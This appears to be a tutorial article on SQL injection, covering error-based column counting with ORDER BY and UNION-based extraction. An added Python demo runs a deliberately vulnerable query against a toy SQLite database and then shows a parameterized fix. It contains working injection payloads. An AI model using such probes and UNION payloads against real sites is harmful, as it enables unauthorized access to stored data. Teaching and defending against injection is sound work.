The vulnerability we are going to look at today is also code injection, but this time on the server side: specifically, in the database service where the web page's information is stored. An attacker who gains access to this database can do some really dangerous things.
What Is SQL Injection?
Given the need for dynamic content in today’s web applications, many of them depend on a database to store the data that the application requests and processes. Web applications run queries against these databases to access the data stored there. These queries are written in SQL (Structured Query Language).
To understand this better, let’s look at an example. Suppose a web page was built for our company with a private area that requires a username and password to access. This web page stores the login data in a database called “Society.”
The web application queries the database to retrieve the data it displays. This query is performed with the SELECT statement: once the database and the table of interest have been located, the data can be filtered so that only certain records are shown, for example the records in the Users table whose id column is equal to 1. The WHERE clause is used for this. This is what the instruction would look like:
How Does SQL Injection Work?
An SQL injection attack occurs when a value from the client’s request is used in an SQL query without first being sanitized. If, as web developers, we do not validate the input and simply trust the data users provide, attackers can extract hidden information from the database or even take control of the server.
For example, suppose the previous query, which looked up the record with id 1, is run by a web page to display that user’s data, and we tell it to order the output by column number 10.
As can be seen, the response indicates that column 10 is unknown. Column 10 clearly does not exist, since the query only returns 4 columns. This is exactly what the attacker wants to learn: the number of columns in the query. If we order by 4 instead, the data is displayed:
Once the attacker knows how many columns the query returns, they craft a 4-column query of their own and join it to the original one with the UNION clause:
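The procedure above (the SELECT with a WHERE filter, the ORDER BY probe that errors past the last column, and the UNION that pulls data from another table) as an added worked example in Python with an in-memory SQLite database standing in for the “Society” database. This is not code from the original article: the four-column Users schema (id, username, password, email), the extra Secrets table and all rows are constructed sample data, since the page only names the Users table and its id column. The parameterized safe_lookup at the end is the fix the article's warning about unsanitized input calls for.

```python
import sqlite3

SELECT_USER = "SELECT id, username, password, email FROM Users WHERE id = "


def make_db():
    """Constructed stand-in for the 'Society' database (schema and rows are assumptions)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE Users (id INTEGER, username TEXT, password TEXT, email TEXT);
        INSERT INTO Users VALUES (1, 'alice', 's3cret', 'alice@example.com');
        INSERT INTO Users VALUES (2, 'bob', 'hunter2', 'bob@example.com');
        CREATE TABLE Secrets (id INTEGER, note TEXT);
        INSERT INTO Secrets VALUES (1, 'quarterly figures');
    """)
    return con


def vulnerable_lookup(con, user_id):
    """The pattern the article describes: the client-supplied id is spliced into the SQL text."""
    sql = SELECT_USER + str(user_id)
    try:
        return {"sql": sql, "rows": con.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        # The page hands the database error back to the client, which is what the attacker reads.
        return {"sql": sql, "rows": [], "error": str(exc)}


def count_columns(con, max_probe=10):
    """Attacker's ORDER BY probe: the largest n for which 'ORDER BY n' does not error
    is the number of columns the original query returns."""
    found = 0
    for n in range(1, max_probe + 1):
        if vulnerable_lookup(con, f"1 ORDER BY {n}")["error"]:
            break
        found = n
    return found


def union_extract(con, ncols, table, column):
    """Attacker's UNION: a second SELECT with the same column count, padded with NULLs,
    so values from another table ride along in the first column of the page's output."""
    padding = ", ".join(["NULL"] * (ncols - 1))
    payload = f"1 UNION SELECT {column}, {padding} FROM {table}"
    result = vulnerable_lookup(con, payload)
    return [row[0] for row in result["rows"]]


def safe_lookup(con, user_id):
    """Parameterized query: the id travels as a bound value, never as SQL text,
    so 'ORDER BY 10' or 'UNION SELECT ...' is just a string that matches no id."""
    sql = "SELECT id, username, password, email FROM Users WHERE id = ?"
    try:
        return {"sql": sql, "rows": con.execute(sql, (user_id,)).fetchall(), "error": None}
    except sqlite3.Error as exc:
        return {"sql": sql, "rows": [], "error": str(exc)}


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, "1 ORDER BY 10")["error"])   # column out of range error
    print(vulnerable_lookup(db, "1 ORDER BY 4")["rows"])     # alice's row, no error
    ncols = count_columns(db)
    print("columns:", ncols)
    print("leaked:", union_extract(db, ncols, "Secrets", "note"))
    print("safe:", safe_lookup(db, "1 UNION SELECT note, NULL, NULL, NULL FROM Secrets")["rows"])
```

The probe stops at the first error, so with a four-column SELECT it returns 4, matching what the article shows with ORDER BY 10 failing and ORDER BY 4 succeeding. With the parameterized version the same payloads return an empty result set rather than an error or leaked rows, because SQLite compares the integer id column against a text value that never matches.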
SQL Injection Example
We can think of this type of SQL injection as error-based: it takes advantage of the error messages the site reports back to us to enumerate privileged information from the database.
Suppose we also have a text box on a web page where we type our username and password, and when we submit it, our account details appear on the page. For this, we have previously created an account in this web application with the username ‘extra’ and the password ‘password123.’